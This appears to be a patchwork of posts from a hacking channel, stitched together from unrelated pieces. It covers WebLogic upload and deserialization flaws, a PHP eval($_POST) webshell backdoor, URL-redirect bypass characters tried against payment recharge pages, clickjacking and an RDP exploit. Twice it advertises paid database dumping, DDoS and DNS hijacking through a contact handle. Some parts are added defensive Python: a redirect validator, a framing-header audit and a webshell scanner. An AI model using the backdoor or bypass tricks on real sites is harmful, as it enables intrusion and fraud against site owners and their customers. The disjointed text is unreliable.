Hackers infiltrate websites, tamper with website content, and launch DDoS attacks.
2. serialFilter assignment process
Let's see how WebLogic initializes this value. When WebLogic starts the T3 server, it initializes the filter. During initialization it first instantiates the filter class, here JreFilterApiProxy.

Before initialization, both FilterProperties and BlacklistProperties are null, so both checks return false, and the processDefaultConfiguration method is then called.

@Mikelaotoo
Code injection:
Assuming o.php is the backdoor left by the hacker:

<?php
// executes whatever PHP arrives in the POST parameter "s"
eval(''.$_POST['s']);
?>

Because AntSword reads the cookies the server sets, the backdoor also needs to call the header function:

<?php
eval(''.$_POST['s']);
// set a cookie whose value carries an HTML tag
header("set-cookie:aaa=<img id=\"1\">;");
?>
Three Tips for Arbitrary File Download on Windows

I saw two ideas proposed in the group, did some simple tests, and added a new idea.

Since this involves reading files used by system services, or other users' files, SYSTEM or Administrators privileges are generally required.
XSS on volgactf-task.ru
XSS on the static subdomain allows attacking the main application by adding arbitrary cookies.
Vulnerable code snippet
Acunetix Web Vulnerability Scanner (AWVS for short) is a well-known web vulnerability scanning tool that tests a website's security by crawling it and detecting common security vulnerabilities.

Starting from version 11.0, AWVS is a browser-based tool, accessed through the custom port chosen during installation.
For database dumping, penetration, cracking, privilege escalation, modification, brute force attacks, DDoS attacks, and DNS hijacking, contact the
technical support: @Mikelaotoo
Set up a website environment locally, with domain address // 127.0.0.1. The simplest and easiest case to understand: when users log in to the website, we perform a redirect hijack so that our phishing page looks exactly like the customer's website. The code is:
It can be seen that the URL redirection vulnerability is fully exploitable. Some websites have protection against redirect payloads, but we can bypass it using characters the check does not cover, for example @, a question mark ?, #, a slash, a backslash, the HTTPS scheme, XSS cross-site payloads, bypassing the recharge interface, and redirect hijacking vulnerabilities. Most platforms and online mall systems have a recharge page, and after a successful recharge they redirect to the merchant's website. To test the redirect we need to recharge a certain amount of money, and we found that the vulnerability exists. As long as you bravely try penetration testing for vulnerabilities, you will gain something. We successfully tested the recharge vulnerability recently.
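The bypass characters listed above all defeat a redirect check that only looks at the start of the target string. The Python below is an added example, not code from this channel or from any site it describes; it assumes the local test site at 127.0.0.1 mentioned above and a constructed probe list. It puts that naive prefix check next to a hardened validator that normalises backslashes the way browsers do, rejects protocol-relative targets, and compares the full scheme and authority against the site's origin, so the @, backslash, slash and HTTPS tricks are all caught.

```python
from urllib.parse import urlsplit

# Assumed origin of the site under test; the post sets up its local test site at 127.0.0.1.
SITE_ORIGIN = "https://127.0.0.1"


def naive_is_safe(target: str, site_origin: str = SITE_ORIGIN) -> bool:
    """Prefix check of the kind the post says some sites rely on. Bypassable."""
    return target.startswith("/") or target.startswith(site_origin)


def is_safe_redirect(target: str, site_origin: str = SITE_ORIGIN) -> bool:
    """Accept target only if a browser would stay on site_origin after following it."""
    if not target:
        return False
    # Browsers treat a backslash in a URL like a forward slash, so "/\evil.com"
    # is loaded as "//evil.com". Normalise before looking at the string.
    candidate = target.strip().replace("\\", "/")
    # Tabs, newlines and other control characters make parsers disagree; refuse them.
    if any(ord(c) < 0x21 for c in candidate):
        return False
    # "//host" and "///host" are both protocol-relative to another host in browsers
    # (extra slashes are ignored), even though urlsplit parses "///x" as a plain path.
    if candidate.startswith("//"):
        return False
    parts = urlsplit(candidate)
    origin = urlsplit(site_origin)
    if parts.scheme or parts.netloc:
        # Absolute URL: scheme and full authority must match the site exactly.
        # This defeats "https://127.0.0.1@evil.com" (the real host sits after '@')
        # and "https://127.0.0.1.evil.com", and rejects javascript: and data: schemes.
        if parts.scheme.lower() != origin.scheme.lower():
            return False
        if parts.netloc.lower() != origin.netloc.lower():
            return False
    path = parts.path or "/"
    # Relative targets must be a single root-relative path.
    return path.startswith("/") and not path.startswith("//")


# Constructed probe list covering the bypass characters named in the post.
PROBES = [
    "/account/recharge?ok=1",
    "https://127.0.0.1/orders#paid",
    "//evil.com",
    "/\\evil.com",
    "/\\/evil.com",
    "https://127.0.0.1@evil.com/",
    "https://127.0.0.1.evil.com/",
    "https://evil.com/?x=https://127.0.0.1",
    "javascript:alert(1)",
]


def compare(probes=PROBES, site_origin=SITE_ORIGIN):
    """Map each probe to (naive verdict, hardened verdict) so the gap is visible."""
    return {p: (naive_is_safe(p, site_origin), is_safe_redirect(p, site_origin)) for p in probes}


if __name__ == "__main__":
    for probe, (naive, hardened) in compare().items():
        print(f"{probe!r:45} naive={naive!s:5} hardened={hardened}")
```

Running it shows the naive check waving through "//evil.com", "/\evil.com" and "https://127.0.0.1@evil.com/", while the hardened check accepts only the two on-site targets. The safest server-side design is still to avoid user-supplied redirect targets altogether and map an opaque token to a fixed allowlist of destinations.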
Clickjacking attacks mainly exploit the transparency attribute of the HTML <iframe> tag and users' trust in the website. Attackers create one or more transparent <iframe>s on top of the target web page so that users cannot see them, then place attractive elements such as buttons, games and video players on the overlay to entice users to click. When users click these seemingly harmless areas, they actually trigger sensitive operations on the target website underneath, such as submitting forms or following links.
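Whether a page can be framed like this is decided by its response headers, so the first thing to check on a target (or on your own site) is the anti-framing posture. The Python below is an added example, not code from this channel; the header sets it audits are constructed for illustration. It applies the precedence browsers use: a Content-Security-Policy frame-ancestors directive overrides X-Frame-Options, a Report-Only policy enforces nothing, and the obsolete ALLOW-FROM form is ignored by current browsers and therefore leaves the page frameable.

```python
def framing_policy(headers: dict) -> str:
    """Classify a page's anti-framing posture from its response headers.

    Returns 'csp' (frame-ancestors restricts framing), 'xfo' (X-Frame-Options
    DENY/SAMEORIGIN), 'ineffective' (a header is present but browsers will not
    enforce it as intended) or 'none' (no framing protection at all).
    Header names are matched case-insensitively.
    """
    lowered = {k.lower(): v.strip() for k, v in headers.items()}

    # Browsers that support frame-ancestors ignore X-Frame-Options when the
    # directive is present, so it is evaluated first. Report-Only CSP does not
    # block anything and is deliberately not consulted.
    csp = lowered.get("content-security-policy", "")
    for directive in csp.split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() != "frame-ancestors":
            continue
        sources = value.split()
        # '*' or a bare scheme such as "https:" lets any site frame the page.
        if "*" in sources or any(s.lower() in ("http:", "https:") for s in sources):
            return "ineffective"
        return "csp"

    xfo = lowered.get("x-frame-options", "").upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return "xfo"
    if xfo:
        # ALLOW-FROM, comma-separated or misspelt values are ignored by current
        # browsers, which then allow framing as if the header were absent.
        return "ineffective"
    return "none"


def is_frameable(headers: dict) -> bool:
    """True when a cross-site page could load this response in an <iframe>."""
    return framing_policy(headers) in ("none", "ineffective")


# Constructed header sets for demonstration; not captured from any real site.
SAMPLE_RESPONSES = {
    "no-protection": {"Content-Type": "text/html"},
    "xfo-deny": {"X-Frame-Options": "DENY"},
    "xfo-allow-from": {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
    "csp-none": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "csp-wildcard-overrides-xfo": {
        "Content-Security-Policy": "frame-ancestors *",
        "X-Frame-Options": "DENY",
    },
    "report-only": {"Content-Security-Policy-Report-Only": "frame-ancestors 'none'"},
}


def audit(responses=SAMPLE_RESPONSES):
    """Return {name: (policy, frameable)} for each response."""
    return {name: (framing_policy(h), is_frameable(h)) for name, h in responses.items()}


if __name__ == "__main__":
    for name, (policy, frameable) in audit().items():
        print(f"{name:28} policy={policy:12} frameable={frameable}")
```

The "csp-wildcard-overrides-xfo" case is the one people get wrong in both directions: X-Frame-Options: DENY looks protective, but the wildcard frame-ancestors next to it is what the browser honours, so the page stays clickjackable.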
The webshell and phishing pages cannot be found in the website directory, yet requesting the page with a specific path, Referer or User-Agent loads the hidden links.
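Two things in this channel are worth being able to find on disk during a response: the eval($_POST[...]) backdoor from the code injection post above, and the Referer/User-Agent gated pages this post describes. The Python below is an added example, not code from this channel or from any scanner it names; the three PHP files are constructed samples, the first mirroring the o.php backdoor shown earlier. It is a line-oriented signature scan that flags a dangerous PHP sink fed by request-controlled data on the same line, and separately flags conditionals on HTTP_USER_AGENT or HTTP_REFERER, which is how hidden links are served only to crawlers or to visitors arriving from a chosen site.

```python
import re

# Constructed PHP samples for the demonstration; not taken from any real incident.
SAMPLES = {
    # mirrors the o.php backdoor in the code injection post above
    "o.php": """<?php
eval(''.$_POST['s']);
header("set-cookie:aaa=<img id=\\"1\\">;");
?>""",
    # serves a hidden link only to a chosen User-Agent, as the post describes
    "footer.php": """<?php
if (strpos($_SERVER['HTTP_USER_AGENT'], 'Baiduspider') !== false) {
    echo '<a href="http://example.invalid/hidden">x</a>';
}
?>""",
    # benign: request data reaches an output encoder, not a code sink
    "index.php": """<?php
echo htmlspecialchars($_GET['q'] ?? '');
?>""",
}

# PHP functions that execute code or commands.
SINKS = r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open|create_function)\s*\("
# Request-controlled superglobals; concatenation such as ''.$_POST['s'] still matches.
SUPERGLOBALS = r"\$_(POST|GET|REQUEST|COOKIE|SERVER)\b"
# Conditionals keyed on the visitor's User-Agent or Referer.
GATES = r"\$_SERVER\s*\[\s*['\"]HTTP_(USER_AGENT|REFERER)['\"]\s*\]"


def scan_php(source: str):
    """Return (line number, finding type, detail) tuples for one PHP source file.

    Deliberately line-based: a sink on one line fed by a variable assigned from
    $_POST on another line will be missed, so treat this as triage, not proof of absence.
    """
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        sink = re.search(SINKS, line)
        if sink and re.search(SUPERGLOBALS, line):
            findings.append((lineno, "request-controlled-sink", sink.group(1)))
        gate = re.search(GATES, line)
        if gate:
            findings.append((lineno, "ua-or-referer-gate", gate.group(1)))
    return findings


def scan_all(samples=SAMPLES):
    """Scan every sample and return {file name: findings}."""
    return {name: scan_php(src) for name, src in samples.items()}


if __name__ == "__main__":
    for name, findings in scan_all().items():
        print(name, findings or "clean")
```

Point the same scan at a real web root with `for path in pathlib.Path(root).rglob("*.php")`, and pair it with a file-integrity or timestamp check, since the post's point is that these files are not where the site owner expects to look.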
If the exploit is successful, it triggers the execution of shellcode at termdd!IcaChannelInputInternal+17d.

Fast detection: fast packet sending and an efficient vulnerability detection algorithm.
Wide coverage: from the common vulnerabilities in the OWASP Top 10 to POCs for various CMS frameworks, all are supported.
High code quality: the code is written by experienced engineers, and its reliability is improved through multiple layers of verification such as code review, unit testing and integration testing.
Advanced customization: the engine's parameters are exposed through configuration files, and editing them allows the functionality to be customized extensively.
Safe and threat-free: Xray is positioned as a security assessment aid, not an attack tool. All built-in payloads and POCs are harmless checks.
The uploaded shell is located in the /config/keystore/ directory under the directory configured in the workbench. The file name format is simple: the value of the timestamp parameter carried in the URL of the POST request, concatenated with an underscore. What shocked me is that WebLogic, from such a well-known software vendor, has such a low-level vulnerability; it is really mind-blowing. Combined with the series of deserialization bypass vulnerabilities, all I can say is that WebLogic products should be used as little as possible if they are not necessary, and sparingly if they must be used.

Continuing to trace and debug to the execute method, located in the ImportTestCaseAction.class class, the actual path is: \user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\com.oracle.webservices.wls.ws-testclient-app-wls_12.1.3\cmprq0\war\WEB-INF\lib\ws-testpage-impl.jar\com\oracle\webservices\testclient\ws\action\ImportTestCaseAction.class
